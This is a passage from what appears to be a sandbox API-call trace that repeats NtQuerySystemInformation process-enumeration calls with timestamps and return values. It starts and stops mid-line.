SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.920] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0136.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b6d0) returned 0x0 [0137.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.456] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.459] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.475] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.476] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.613] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.626] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.627] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.635] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.636] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b750) returned 0x0 [0137.679] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.681] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.682] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.683] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.684] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.691] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.692] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.698] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.699] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.700] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.708] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.709] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.711] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.736] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.737] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.760] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.761] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.762] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.802] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.817] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.844] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3280420, Length=0x25f40, ResultLength=0x53ff7ec | out: SystemInformation=0x3280420, ResultLength=0x53ff7ec*=0x1b860) returned 0x0 [0137.884] NtQuerySystemInformation 